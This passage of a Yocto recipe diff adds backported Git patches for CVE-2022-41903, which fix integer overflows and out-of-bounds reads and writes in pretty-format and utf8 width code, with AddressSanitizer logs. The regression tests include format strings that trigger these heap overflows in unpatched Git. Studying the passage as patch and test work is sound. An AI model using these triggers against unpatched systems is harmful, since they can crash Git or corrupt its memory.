+      0x0c047fff80b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+      0x0c047fff80c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+    Shadow byte legend (one shadow byte represents 8 application bytes):
+      Addressable:           00
+      Partially addressable: 01 02 03 04 05 06 07
+      Heap left redzone:       fa
+      Freed heap region:       fd
+      Stack left redzone:      f1
+      Stack mid redzone:       f2
+      Stack right redzone:     f3
+      Stack after return:      f5
+      Stack use after scope:   f8
+      Global redzone:          f9
+      Global init order:       f6
+      Poisoned by user:        f7
+      Container overflow:      fc
+      Array cookie:            ac
+      Intra object redzone:    bb
+      ASan internal:           fe
+      Left alloca redzone:     ca
+      Right alloca redzone:    cb
+    ==10888==ABORTING
+
+Fix this bug by checking whether `end` points at the trailing NUL byte.
+Add a test which catches this out-of-bounds read and which demonstrates
+that we used to write out-of-bounds data into the formatted message.
+
+Reported-by: Markus Vervier <markus.vervier@x41-dsec.de>
+Original-patch-by: Markus Vervier <markus.vervier@x41-dsec.de>
+Signed-off-by: Patrick Steinhardt <ps@pks.im>
+Signed-off-by: Junio C Hamano <gitster@pobox.com>
+
+Upstream-Status: Backport [https://github.com/git/git/commit/f6e0b9f38987ad5e47bab551f8760b70689a5905]
+CVE: CVE-2022-41903
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ pretty.c                      | 2 +-
+ t/t4205-log-pretty-formats.sh | 6 ++++++
+ 2 files changed, 7 insertions(+), 1 deletion(-)
+
+diff --git a/pretty.c b/pretty.c
+index 4348a82..c49e818 100644
+--- a/pretty.c
++++ b/pretty.c
+@@ -1024,7 +1024,7 @@ static size_t parse_padding_placeholder(const char *placeholder,
+ 		const char *end = start + strcspn(start, ",)");
+ 		char *next;
+ 		int width;
+-		if (!end || end == start)
++		if (!*end || end == start)
+ 			return 0;
+ 		width = strtol(start, &next, 10);
+ 		if (next == start || width == 0)
+diff --git a/t/t4205-log-pretty-formats.sh b/t/t4205-log-pretty-formats.sh
+index e69caba..8a349df 100755
+--- a/t/t4205-log-pretty-formats.sh
++++ b/t/t4205-log-pretty-formats.sh
+@@ -794,6 +794,12 @@ test_expect_success 'log --pretty with space stealing' '
+ 	test_cmp expect actual
+ '
+ 
++test_expect_success 'log --pretty with invalid padding format' '
++	printf "%s%%<(20" "$(git rev-parse HEAD)" >expect &&
++	git log -1 --pretty="format:%H%<(20" >actual &&
++	test_cmp expect actual
++'
++
+ test_expect_success EXPENSIVE,SIZE_T_IS_64BIT 'log --pretty with huge commit message' '
+ 	# We only assert that this command does not crash. This needs to be
+ 	# executed with the address sanitizer to demonstrate failure.
+-- 
+2.25.1
+
diff --git a/meta/recipes-devtools/git/files/CVE-2022-41903-05.patch b/meta/recipes-devtools/git/files/CVE-2022-41903-05.patch
new file mode 100644
index 0000000000..994f7a55b1
--- /dev/null
+++ b/meta/recipes-devtools/git/files/CVE-2022-41903-05.patch
@@ -0,0 +1,98 @@
+From 1de69c0cdd388b0a5b7bdde0bfa0bda514a354b0 Mon Sep 17 00:00:00 2001
+From: Patrick Steinhardt <ps@pks.im>
+Date: Thu, 1 Dec 2022 15:46:39 +0100
+Subject: [PATCH 05/12] pretty: fix adding linefeed when placeholder is not expanded
+
+When a formatting directive has a `+` or ` ` after the `%`, then we add
+either a line feed or space if the placeholder expands to a non-empty
+string. In specific cases though this logic doesn't work as expected,
+and we try to add the character even in the case where the formatting
+directive is empty.
+
+One such pattern is `%w(1)%+d%+w(2)`. `%+d` expands to reference names
+pointing to a certain commit, like in `git log --decorate`. For a tagged
+commit this would for example expand to `\n (tag: v1.0.0)`, which has a
+leading newline due to the `+` modifier and a space added by `%d`. Now
+the second wrapping directive will cause us to rewrap the text to
+`\n(tag:\nv1.0.0)`, which is one byte shorter due to the missing leading
+space. The code that handles the `+` magic now notices that the length
+has changed and will thus try to insert a leading line feed at the
+original posititon. But as the string was shortened, the original
+position is past the buffer's boundary and thus we die with an error.
+
+Now there are two issues here:
+
+    1. We check whether the buffer length has changed, not whether it
+       has been extended. This causes us to try and add the character
+       past the string boundary.
+
+    2. The current logic does not make any sense whatsoever. When the
+       string got expanded due to the rewrap, putting the separator into
+       the original position is likely to put it somewhere into the
+       middle of the rewrapped contents.
+
+It is debatable whether `%+w()` makes any sense in the first place.
+Strictly speaking, the placeholder never expands to a non-empty string,
+and consequentially we shouldn't ever accept this combination. We thus
+fix the bug by simply refusing `%+w()`.
+
+Signed-off-by: Patrick Steinhardt <ps@pks.im>
+Signed-off-by: Junio C Hamano <gitster@pobox.com>
+
+Upstream-Status: Backport [https://github.com/git/git/commit/1de69c0cdd388b0a5b7bdde0bfa0bda514a354b0]
+CVE: CVE-2022-41903
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ pretty.c                      | 14 +++++++++++++-
+ t/t4205-log-pretty-formats.sh |  8 ++++++++
+ 2 files changed, 21 insertions(+), 1 deletion(-)
+
+diff --git a/pretty.c b/pretty.c
+index c49e818..195d005 100644
+--- a/pretty.c
++++ b/pretty.c
+@@ -1551,9 +1551,21 @@ static size_t format_commit_item(struct strbuf *sb, /* in UTF-8 */
+ 	default:
+ 		break;
+ 	}
+-	if (magic != NO_MAGIC)
++	if (magic != NO_MAGIC) {
+ 		placeholder++;
+ 
++		switch (placeholder[0]) {
++		case 'w':
++			/*
++			 * `%+w()` cannot ever expand to a non-empty string,
++			 * and it potentially changes the layout of preceding
++			 * contents. We're thus not able to handle the magic in
++			 * this combination and refuse the pattern.
++			 */
++			return 0;
++		};
++	}
++
+ 	orig_len = sb->len;
+ 	if (((struct format_commit_context *)context)->flush_type != no_flush)
+ 		consumed = format_and_pad_commit(sb, placeholder, context);
+diff --git a/t/t4205-log-pretty-formats.sh b/t/t4205-log-pretty-formats.sh
+index 8a349df..fa1bc2b 100755
+--- a/t/t4205-log-pretty-formats.sh
++++ b/t/t4205-log-pretty-formats.sh
+@@ -800,6 +800,14 @@ test_expect_success 'log --pretty with invalid padding format' '
+ 	test_cmp expect actual
+ '
+ 
++test_expect_success 'log --pretty with magical wrapping directives' '
++	commit_id=$(git commit-tree HEAD^{tree} -m "describe me") &&
++	git tag describe-me $commit_id &&
++	printf "\n(tag:\ndescribe-me)%%+w(2)" >expect &&
++	git log -1 --pretty="format:%w(1)%+d%+w(2)" $commit_id >actual &&
++	test_cmp expect actual
++'
++
+ test_expect_success EXPENSIVE,SIZE_T_IS_64BIT 'log --pretty with huge commit message' '
+ 	# We only assert that this command does not crash. This needs to be
+ 	# executed with the address sanitizer to demonstrate failure.
+-- 
+2.25.1
+
diff --git a/meta/recipes-devtools/git/files/CVE-2022-41903-06.patch b/meta/recipes-devtools/git/files/CVE-2022-41903-06.patch
new file mode 100644
index 0000000000..93fbe5c7fe
--- /dev/null
+++ b/meta/recipes-devtools/git/files/CVE-2022-41903-06.patch
@@ -0,0 +1,90 @@
+From 48050c42c73c28b0c001d63d11dffac7e116847b Mon Sep 17 00:00:00 2001
+From: Patrick Steinhardt <ps@pks.im>
+Date: Thu, 1 Dec 2022 15:46:49 +0100
+Subject: [PATCH 06/12] pretty: fix integer overflow in wrapping format
+
+The `%w(width,indent1,indent2)` formatting directive can be used to
+rewrap text to a specific width and is designed after git-shortlog(1)'s
+`-w` parameter. While the three parameters are all stored as `size_t`
+internally, `strbuf_add_wrapped_text()` accepts integers as input. As a
+result, the casted integers may overflow. As these now-negative integers
+are later on passed to `strbuf_addchars()`, we will ultimately run into
+implementation-defined behaviour due to casting a negative number back
+to `size_t` again. On my platform, this results in trying to allocate
+9000 petabyte of memory.
+
+Fix this overflow by using `cast_size_t_to_int()` so that we reject
+inputs that cannot be represented as an integer.
+
+Signed-off-by: Patrick Steinhardt <ps@pks.im>
+Signed-off-by: Junio C Hamano <gitster@pobox.com>
+
+Upstream-Status: Backport [https://github.com/git/git/commit/48050c42c73c28b0c001d63d11dffac7e116847b]
+CVE: CVE-2022-41903
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ git-compat-util.h             |  8 ++++++++
+ pretty.c                      |  4 +++-
+ t/t4205-log-pretty-formats.sh | 12 ++++++++++++
+ 3 files changed, 23 insertions(+), 1 deletion(-)
+
+diff --git a/git-compat-util.h b/git-compat-util.h
+index a1ecfd3..b0f3890 100644
+--- a/git-compat-util.h
++++ b/git-compat-util.h
+@@ -854,6 +854,14 @@ static inline size_t st_sub(size_t a, size_t b)
+ 	return a - b;
+ }
+ 
++static inline int cast_size_t_to_int(size_t a)
++{
++	if (a > INT_MAX)
++		die("number too large to represent as int on this platform: %"PRIuMAX,
++		    (uintmax_t)a);
++	return (int)a;
++}
++
+ #ifdef HAVE_ALLOCA_H
+ # include <alloca.h>
+ # define xalloca(size)      (alloca(size))
+diff --git a/pretty.c b/pretty.c
+index 195d005..ff9fc97 100644
+--- a/pretty.c
++++ b/pretty.c
+@@ -898,7 +898,9 @@ static void strbuf_wrap(struct strbuf *sb, size_t pos,
+ 	if (pos)
+ 		strbuf_add(&tmp, sb->buf, pos);
+ 	strbuf_add_wrapped_text(&tmp, sb->buf + pos,
+-				(int) indent1, (int) indent2, (int) width);
++				cast_size_t_to_int(indent1),
++				cast_size_t_to_int(indent2),
++				cast_size_t_to_int(width));
+ 	strbuf_swap(&tmp, sb);
+ 	strbuf_release(&tmp);
+ }
+diff --git a/t/t4205-log-pretty-formats.sh b/t/t4205-log-pretty-formats.sh
+index fa1bc2b..23ac508 100755
+--- a/t/t4205-log-pretty-formats.sh
++++ b/t/t4205-log-pretty-formats.sh
+@@ -808,6 +808,18 @@ test_expect_success 'log --pretty with magical wrapping directives' '
+ 	test_cmp expect actual
+ '
+ 
++test_expect_success SIZE_T_IS_64BIT 'log --pretty with overflowing wrapping directive' '
++	cat >expect <<-EOF &&
++	fatal: number too large to represent as int on this platform: 2147483649
++	EOF
++	test_must_fail git log -1 --pretty="format:%w(2147483649,1,1)%d" 2>error &&
++	test_cmp expect error &&
++	test_must_fail git log -1 --pretty="format:%w(1,2147483649,1)%d" 2>error &&
++	test_cmp expect error &&
++	test_must_fail git log -1 --pretty="format:%w(1,1,2147483649)%d" 2>error &&
++	test_cmp expect error
++'
++
+ test_expect_success EXPENSIVE,SIZE_T_IS_64BIT 'log --pretty with huge commit message' '
+ 	# We only assert that this command does not crash. This needs to be
+ 	# executed with the address sanitizer to demonstrate failure.
+-- 
+2.25.1
+
diff --git a/meta/recipes-devtools/git/files/CVE-2022-41903-07.patch b/meta/recipes-devtools/git/files/CVE-2022-41903-07.patch
new file mode 100644
index 0000000000..ec248ad6c2
--- /dev/null
+++ b/meta/recipes-devtools/git/files/CVE-2022-41903-07.patch
@@ -0,0 +1,123 @@
+From 522cc87fdc25449222a5894a428eebf4b8d5eaa9 Mon Sep 17 00:00:00 2001
+From: Patrick Steinhardt <ps@pks.im>
+Date: Thu, 1 Dec 2022 15:46:53 +0100
+Subject: [PATCH 07/12] utf8: fix truncated string lengths in utf8_strnwidth()
+
+The `utf8_strnwidth()` function accepts an optional string length as
+input parameter. This parameter can either be set to `-1`, in which case
+we call `strlen()` on the input. Or it can be set to a positive integer
+that indicates a precomputed length, which callers typically compute by
+calling `strlen()` at some point themselves.
+
+The input parameter is an `int` though, whereas `strlen()` returns a
+`size_t`. This can lead to implementation-defined behaviour though when
+the `size_t` cannot be represented by the `int`. In the general case
+though this leads to wrap-around and thus to negative string sizes,
+which is sure enough to not lead to well-defined behaviour.
+
+Fix this by accepting a `size_t` instead of an `int` as string length.
+While this takes away the ability of callers to simply pass in `-1` as
+string length, it really is trivial enough to convert them to instead
+pass in `strlen()` instead.
+
+Signed-off-by: Patrick Steinhardt <ps@pks.im>
+Signed-off-by: Junio C Hamano <gitster@pobox.com>
+
+Upstream-Status: Backport [https://github.com/git/git/commit/522cc87fdc25449222a5894a428eebf4b8d5eaa9]
+CVE: CVE-2022-41903
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ column.c | 2 +-
+ pretty.c | 4 ++--
+ utf8.c   | 8 +++-----
+ utf8.h   | 2 +-
+ 4 files changed, 7 insertions(+), 9 deletions(-)
+
+diff --git a/column.c b/column.c
+index 4a38eed..0c79850 100644
+--- a/column.c
++++ b/column.c
+@@ -23,7 +23,7 @@ struct column_data {
+ /* return length of 's' in letters, ANSI escapes stripped */
+ static int item_length(const char *s)
+ {
+-	return utf8_strnwidth(s, -1, 1);
++	return utf8_strnwidth(s, strlen(s), 1);
+ }
+ 
+ /*
+diff --git a/pretty.c b/pretty.c
+index ff9fc97..c3c1443 100644
+--- a/pretty.c
++++ b/pretty.c
+@@ -1437,7 +1437,7 @@ static size_t format_and_pad_commit(struct strbuf *sb, /* in UTF-8 */
+ 		int occupied;
+ 		if (!start)
+ 			start = sb->buf;
+-		occupied = utf8_strnwidth(start, -1, 1);
++		occupied = utf8_strnwidth(start, strlen(start), 1);
+ 		occupied += c->pretty_ctx->graph_width;
+ 		padding = (-padding) - occupied;
+ 	}
+@@ -1455,7 +1455,7 @@ static size_t format_and_pad_commit(struct strbuf *sb, /* in UTF-8 */
+ 		placeholder++;
+ 		total_consumed++;
+ 	}
+-	len = utf8_strnwidth(local_sb.buf, -1, 1);
++	len = utf8_strnwidth(local_sb.buf, local_sb.len, 1);
+ 
+ 	if (c->flush_type == flush_left_and_steal) {
+ 		const char *ch = sb->buf + sb->len - 1;
+diff --git a/utf8.c b/utf8.c
+index 5c8f151..a66984b 100644
+--- a/utf8.c
++++ b/utf8.c
+@@ -206,13 +206,11 @@ int utf8_width(const char **start, size_t *remainder_p)
+  * string, assuming that the string is utf8.  Returns strlen() instead
+  * if the string does not look like a valid utf8 string.
+  */
+-int utf8_strnwidth(const char *string, int len, int skip_ansi)
++int utf8_strnwidth(const char *string, size_t len, int skip_ansi)
+ {
+ 	int width = 0;
+ 	const char *orig = string;
+ 
+-	if (len == -1)
+-		len = strlen(string);
+ 	while (string && string < orig + len) {
+ 		int skip;
+ 		while (skip_ansi &&
+@@ -225,7 +223,7 @@ int utf8_strnwidth(const char *string, int len, int skip_ansi)
+ 
+ int utf8_strwidth(const char *string)
+ {
+-	return utf8_strnwidth(string, -1, 0);
++	return utf8_strnwidth(string, strlen(string), 0);
+ }
+ 
+ int is_utf8(const char *text)
+@@ -792,7 +790,7 @@ int skip_utf8_bom(char **text, size_t len)
+ void strbuf_utf8_align(struct strbuf *buf, align_type position, unsigned int width,
+ 		       const char *s)
+ {
+-	int slen = strlen(s);
++	size_t slen = strlen(s);
+ 	int display_len = utf8_strnwidth(s, slen, 0);
+ 	int utf8_compensation = slen - display_len;
+ 
+diff --git a/utf8.h b/utf8.h
+index fcd5167..6da1b6d 100644
+--- a/utf8.h
++++ b/utf8.h
+@@ -7,7 +7,7 @@ typedef unsigned int ucs_char_t;  /* assuming 32bit int */
+ 
+ size_t display_mode_esc_sequence_len(const char *s);
+ int utf8_width(const char **start, size_t *remainder_p);
+-int utf8_strnwidth(const char *string, int len, int skip_ansi);
++int utf8_strnwidth(const char *string, size_t len, int skip_ansi);
+ int utf8_strwidth(const char *string);
+ int is_utf8(const char *text);
+ int is_encoding_utf8(const char *name);
+-- 
+2.25.1
+
diff --git a/meta/recipes-devtools/git/files/CVE-2022-41903-08.patch b/meta/recipes-devtools/git/files/CVE-2022-41903-08.patch
new file mode 100644
index 0000000000..3de6a5ba6a
--- /dev/null
+++ b/meta/recipes-devtools/git/files/CVE-2022-41903-08.patch
@@ -0,0 +1,67 @@
+From 17d23e8a3812a5ca3dd6564e74d5250f22e5d76d Mon Sep 17 00:00:00 2001
+From: Patrick Steinhardt <ps@pks.im>
+Date: Thu, 1 Dec 2022 15:47:00 +0100
+Subject: [PATCH 08/12] utf8: fix returning negative string width
+
+The `utf8_strnwidth()` function calls `utf8_width()` in a loop and adds
+its returned width to the end result. `utf8_width()` can return `-1`
+though in case it reads a control character, which means that the
+computed string width is going to be wrong. In the worst case where
+there are more control characters than non-control characters, we may
+even return a negative string width.
+
+Fix this bug by treating control characters as having zero width.
+
+Signed-off-by: Patrick Steinhardt <ps@pks.im>
+Signed-off-by: Junio C Hamano <gitster@pobox.com>
+
+Upstream-Status: Backport [https://github.com/git/git/commit/17d23e8a3812a5ca3dd6564e74d5250f22e5d76d]
+CVE: CVE-2022-41903
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ t/t4205-log-pretty-formats.sh | 6 ++++++
+ utf8.c                        | 8 ++++++--
+ 2 files changed, 12 insertions(+), 2 deletions(-)
+
+diff --git a/t/t4205-log-pretty-formats.sh b/t/t4205-log-pretty-formats.sh
+index 23ac508..261a6f0 100755
+--- a/t/t4205-log-pretty-formats.sh
++++ b/t/t4205-log-pretty-formats.sh
+@@ -820,6 +820,12 @@ test_expect_success SIZE_T_IS_64BIT 'log --pretty with overflowing wrapping dire
+ 	test_cmp expect error
+ '
+ 
++test_expect_success 'log --pretty with padding and preceding control chars' '
++	printf "\20\20   0" >expect &&
++	git log -1 --pretty="format:%x10%x10%>|(4)%x30" >actual &&
++	test_cmp expect actual
++'
++
+ test_expect_success EXPENSIVE,SIZE_T_IS_64BIT 'log --pretty with huge commit message' '
+ 	# We only assert that this command does not crash. This needs to be
+ 	# executed with the address sanitizer to demonstrate failure.
+diff --git a/utf8.c b/utf8.c
+index a66984b..6632bd2 100644
+--- a/utf8.c
++++ b/utf8.c
+@@ -212,11 +212,15 @@ int utf8_strnwidth(const char *string, size_t len, int skip_ansi)
+ 	const char *orig = string;
+ 
+ 	while (string && string < orig + len) {
+-		int skip;
++		int glyph_width, skip;
++
+ 		while (skip_ansi &&
+ 		       (skip = display_mode_esc_sequence_len(string)) != 0)
+ 			string += skip;
+-		width += utf8_width(&string, NULL);
++
++		glyph_width = utf8_width(&string, NULL);
++		if (glyph_width > 0)
++			width += glyph_width;
+ 	}
+ 	return string ? width : len;
+ }
+-- 
+2.25.1
+
diff --git a/meta/recipes-devtools/git/files/CVE-2022-41903-09.patch b/meta/recipes-devtools/git/files/CVE-2022-41903-09.patch
new file mode 100644
index 0000000000..761d4c6a9f
--- /dev/null
+++ b/meta/recipes-devtools/git/files/CVE-2022-41903-09.patch
@@ -0,0 +1,162 @@
+From 937b71cc8b5b998963a7f9a33312ba3549d55510 Mon Sep 17 00:00:00 2001
+From: Patrick Steinhardt <ps@pks.im>
+Date: Thu, 1 Dec 2022 15:47:04 +0100
+Subject: [PATCH 09/12] utf8: fix overflow when returning string width
+
+The return type of both `utf8_strwidth()` and `utf8_strnwidth()` is
+`int`, but we operate on string lengths which are typically of type
+`size_t`. This means that when the string is longer than `INT_MAX`, we
+will overflow and thus return a negative result.
+
+This can lead to an out-of-bounds write with `--pretty=format:%<1)%B`
+and a commit message that is 2^31+1 bytes long:
+
+    =================================================================
+    ==26009==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x603000001168 at pc 0x7f95c4e5f427 bp 0x7ffd8541c900 sp 0x7ffd8541c0a8
+    WRITE of size 2147483649 at 0x603000001168 thread T0
+        #0 0x7f95c4e5f426 in __interceptor_memcpy /usr/src/debug/gcc/libsanitizer/sanitizer_common/sanitizer_common_interceptors.inc:827
+        #1 0x5612bbb1068c in format_and_pad_commit pretty.c:1763
+        #2 0x5612bbb1087a in format_commit_item pretty.c:1801
+        #3 0x5612bbc33bab in strbuf_expand strbuf.c:429
+        #4 0x5612bbb110e7 in repo_format_commit_message pretty.c:1869
+        #5 0x5612bbb12d96 in pretty_print_commit pretty.c:2161
+        #6 0x5612bba0a4d5 in show_log log-tree.c:781
+        #7 0x5612bba0d6c7 in log_tree_commit log-tree.c:1117
+        #8 0x5612bb691ed5 in cmd_log_walk_no_free builtin/log.c:508
+        #9 0x5612bb69235b in cmd_log_walk builtin/log.c:549
+        #10 0x5612bb6951a2 in cmd_log builtin/log.c:883
+        #11 0x5612bb56c993 in run_builtin git.c:466
+        #12 0x5612bb56d397 in handle_builtin git.c:721
+        #13 0x5612bb56db07 in run_argv git.c:788
+        #14 0x5612bb56e8a7 in cmd_main git.c:923
+        #15 0x5612bb803682 in main common-main.c:57
+        #16 0x7f95c4c3c28f  (/usr/lib/libc.so.6+0x2328f)
+        #17 0x7f95c4c3c349 in __libc_start_main (/usr/lib/libc.so.6+0x23349)
+        #18 0x5612bb5680e4 in _start ../sysdeps/x86_64/start.S:115
+
+    0x603000001168 is located 0 bytes to the right of 24-byte region [0x603000001150,0x603000001168)
+    allocated by thread T0 here:
+        #0 0x7f95c4ebe7ea in __interceptor_realloc /usr/src/debug/gcc/libsanitizer/asan/asan_malloc_linux.cpp:85
+        #1 0x5612bbcdd556 in xrealloc wrapper.c:136
+        #2 0x5612bbc310a3 in strbuf_grow strbuf.c:99
+        #3 0x5612bbc32acd in strbuf_add strbuf.c:298
+        #4 0x5612bbc33aec in strbuf_expand strbuf.c:418
+        #5 0x5612bbb110e7 in repo_format_commit_message pretty.c:1869
+        #6 0x5612bbb12d96 in pretty_print_commit pretty.c:2161
+        #7 0x5612bba0a4d5 in show_log log-tree.c:781
+        #8 0x5612bba0d6c7 in log_tree_commit log-tree.c:1117
+        #9 0x5612bb691ed5 in cmd_log_walk_no_free builtin/log.c:508
+        #10 0x5612bb69235b in cmd_log_walk builtin/log.c:549
+        #11 0x5612bb6951a2 in cmd_log builtin/log.c:883
+        #12 0x5612bb56c993 in run_builtin git.c:466
+        #13 0x5612bb56d397 in handle_builtin git.c:721
+        #14 0x5612bb56db07 in run_argv git.c:788
+        #15 0x5612bb56e8a7 in cmd_main git.c:923
+        #16 0x5612bb803682 in main common-main.c:57
+        #17 0x7f95c4c3c28f  (/usr/lib/libc.so.6+0x2328f)
+
+    SUMMARY: AddressSanitizer: heap-buffer-overflow /usr/src/debug/gcc/libsanitizer/sanitizer_common/sanitizer_common_interceptors.inc:827 in __interceptor_memcpy
+    Shadow bytes around the buggy address:
+      0x0c067fff81d0: fd fd fd fa fa fa fd fd fd fa fa fa fd fd fd fa
+      0x0c067fff81e0: fa fa fd fd fd fd fa fa fd fd fd fd fa fa fd fd
+      0x0c067fff81f0: fd fa fa fa fd fd fd fa fa fa fd fd fd fa fa fa
+      0x0c067fff8200: fd fd fd fa fa fa fd fd fd fd fa fa 00 00 00 fa
+      0x0c067fff8210: fa fa fd fd fd fa fa fa fd fd fd fa fa fa fd fd
+    =>0x0c067fff8220: fd fa fa fa fd fd fd fa fa fa 00 00 00[fa]fa fa
+      0x0c067fff8230: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+      0x0c067fff8240: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+      0x0c067fff8250: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+      0x0c067fff8260: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+      0x0c067fff8270: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+    Shadow byte legend (one shadow byte represents 8 application bytes):
+      Addressable:           00
+      Partially addressable: 01 02 03 04 05 06 07
+      Heap left redzone:       fa
+      Freed heap region:       fd
+      Stack left redzone:      f1
+      Stack mid redzone:       f2
+      Stack right redzone:     f3
+      Stack after return:      f5
+      Stack use after scope:   f8
+      Global redzone:          f9
+      Global init order:       f6
+      Poisoned by user:        f7
+      Container overflow:      fc
+      Array cookie:            ac
+      Intra object redzone:    bb
+      ASan internal:           fe
+      Left alloca redzone:     ca
+      Right alloca redzone:    cb
+    ==26009==ABORTING
+
+Now the proper fix for this would be to convert both functions to return
+an `size_t` instead of an `int`. But given that this commit may be part
+of a security release, let's instead do the minimal viable fix and die
+in case we see an overflow.
+
+Add a test that would have previously caused us to crash.
+
+Signed-off-by: Patrick Steinhardt <ps@pks.im>
+Signed-off-by: Junio C Hamano <gitster@pobox.com>
+
+Upstream-Status: Backport [https://github.com/git/git/commit/937b71cc8b5b998963a7f9a33312ba3549d55510]
+CVE: CVE-2022-41903
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ t/t4205-log-pretty-formats.sh |  8 ++++++++
+ utf8.c                        | 12 +++++++++---
+ 2 files changed, 17 insertions(+), 3 deletions(-)
+
+diff --git a/t/t4205-log-pretty-formats.sh b/t/t4205-log-pretty-formats.sh
+index 261a6f0..de15007 100755
+--- a/t/t4205-log-pretty-formats.sh
++++ b/t/t4205-log-pretty-formats.sh
+@@ -843,4 +843,12 @@ test_expect_success EXPENSIVE,SIZE_T_IS_64BIT 'log --pretty with huge commit mes
+ 	test_cmp expect actual
+ '
+ 
++test_expect_success EXPENSIVE,SIZE_T_IS_64BIT 'log --pretty with huge commit message does not cause allocation failure' '
++	test_must_fail git log -1 --format="%<(1)%B" $huge_commit 2>error &&
++	cat >expect <<-EOF &&
++	fatal: number too large to represent as int on this platform: 2147483649
++	EOF
++	test_cmp expect error
++'
++
+ test_done
+diff --git a/utf8.c b/utf8.c
+index 6632bd2..03be475 100644
+--- a/utf8.c
++++ b/utf8.c
+@@ -208,11 +208,12 @@ int utf8_width(const char **start, size_t *remainder_p)
+  */
+ int utf8_strnwidth(const char *string, size_t len, int skip_ansi)
+ {
+-	int width = 0;
+ 	const char *orig = string;
++	size_t width = 0;
+ 
+ 	while (string && string < orig + len) {
+-		int glyph_width, skip;
++		int glyph_width;
++		size_t skip;
+ 
+ 		while (skip_ansi &&
+ 		       (skip = display_mode_esc_sequence_len(string)) != 0)
+@@ -222,7 +223,12 @@ int utf8_strnwidth(const char *string, size_t len, int skip_ansi)
+ 		if (glyph_width > 0)
+ 			width += glyph_width;
+ 	}
+-	return string ? width : len;
++
++	/*
++	 * TODO: fix the interface of this function and `utf8_strwidth()` to
++	 * return `size_t` instead of `int`.
++	 */
++	return cast_size_t_to_int(string ? width : len);
+ }
+ 
+ int utf8_strwidth(const char *string)
+-- 
+2.25.1
+
diff --git a/meta/recipes-devtools/git/files/CVE-2022-41903-10.patch b/meta/recipes-devtools/git/files/CVE-2022-41903-10.patch
new file mode 100644
index 0000000000..bbfc6e758f
--- /dev/null
+++ b/meta/recipes-devtools/git/files/CVE-2022-41903-10.patch
@@ -0,0 +1,99 @@
+From 81c2d4c3a5ba0e6ab8c348708441fed170e63a82 Mon Sep 17 00:00:00 2001
+From: Patrick Steinhardt <ps@pks.im>
+Date: Thu, 1 Dec 2022 15:47:10 +0100
+Subject: [PATCH 10/12] utf8: fix checking for glyph width in strbuf_utf8_replace()
+
+In `strbuf_utf8_replace()`, we call `utf8_width()` to compute the width
+of the current glyph. If the glyph is a control character though it can
+be that `utf8_width()` returns `-1`, but because we assign this value to
+a `size_t` the conversion will cause us to underflow. This bug can
+easily be triggered with the following command:
+
+    $ git log --pretty='format:xxx%<|(1,trunc)%x10'
+
+>From all I can see though this seems to be a benign underflow that has
+no security-related consequences.
+
+Fix the bug by using an `int` instead. When we see a control character,
+we now copy it into the target buffer but don't advance the current
+width of the string.
+
+Signed-off-by: Patrick Steinhardt <ps@pks.im>
+Signed-off-by: Junio C Hamano <gitster@pobox.com>
+
+Upstream-Status: Backport [https://github.com/git/git/commit/81c2d4c3a5ba0e6ab8c348708441fed170e63a82]
+CVE: CVE-2022-41903
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ t/t4205-log-pretty-formats.sh |  7 +++++++
+ utf8.c                        | 19 ++++++++++++++-----
+ 2 files changed, 21 insertions(+), 5 deletions(-)
+
+diff --git a/t/t4205-log-pretty-formats.sh b/t/t4205-log-pretty-formats.sh
+index de15007..52c8bc8 100755
+--- a/t/t4205-log-pretty-formats.sh
++++ b/t/t4205-log-pretty-formats.sh
+@@ -826,6 +826,13 @@ test_expect_success 'log --pretty with padding and preceding control chars' '
+ 	test_cmp expect actual
+ '
+ 
++test_expect_success 'log --pretty truncation with control chars' '
++	test_commit "$(printf "\20\20\20\20xxxx")" file contents commit-with-control-chars &&
++	printf "\20\20\20\20x.." >expect &&
++	git log -1 --pretty="format:%<(3,trunc)%s" commit-with-control-chars >actual &&
++	test_cmp expect actual
++'
++
+ test_expect_success EXPENSIVE,SIZE_T_IS_64BIT 'log --pretty with huge commit message' '
+ 	# We only assert that this command does not crash. This needs to be
+ 	# executed with the address sanitizer to demonstrate failure.
+diff --git a/utf8.c b/utf8.c
+index 03be475..ec03e69 100644
+--- a/utf8.c
++++ b/utf8.c
+@@ -377,6 +377,7 @@ void strbuf_utf8_replace(struct strbuf *sb_src, int pos, int width,
+ 	dst = sb_dst.buf;
+ 
+ 	while (src < end) {
++		int glyph_width;
+ 		char *old;
+ 		size_t n;
+ 
+@@ -390,21 +391,29 @@ void strbuf_utf8_replace(struct strbuf *sb_src, int pos, int width,
+ 			break;
+ 
+ 		old = src;
+-		n = utf8_width((const char**)&src, NULL);
+-		if (!src) 	/* broken utf-8, do nothing */
++		glyph_width = utf8_width((const char**)&src, NULL);
++		if (!src) /* broken utf-8, do nothing */
+ 			goto out;
+-		if (n && w >= pos && w < pos + width) {
++
++		/*
++		 * In case we see a control character we copy it into the
++		 * buffer, but don't add it to the width.
++		 */
++		if (glyph_width < 0)
++			glyph_width = 0;
++
++		if (glyph_width && w >= pos && w < pos + width) {
+ 			if (subst) {
+ 				memcpy(dst, subst, subst_len);
+ 				dst += subst_len;
+ 				subst = NULL;
+ 			}
+-			w += n;
++			w += glyph_width;
+ 			continue;
+ 		}
+ 		memcpy(dst, old, src - old);
+ 		dst += src - old;
+-		w += n;
++		w += glyph_width;
+ 	}
+ 	strbuf_setlen(&sb_dst, dst - sb_dst.buf);
+ 	strbuf_swap(sb_src, &sb_dst);
+-- 
+2.25.1
+
diff --git a/meta/recipes-devtools/git/files/CVE-2022-41903-11.patch b/meta/recipes-devtools/git/files/CVE-2022-41903-11.patch
new file mode 100644
index 0000000000..f339edfc8a
--- /dev/null
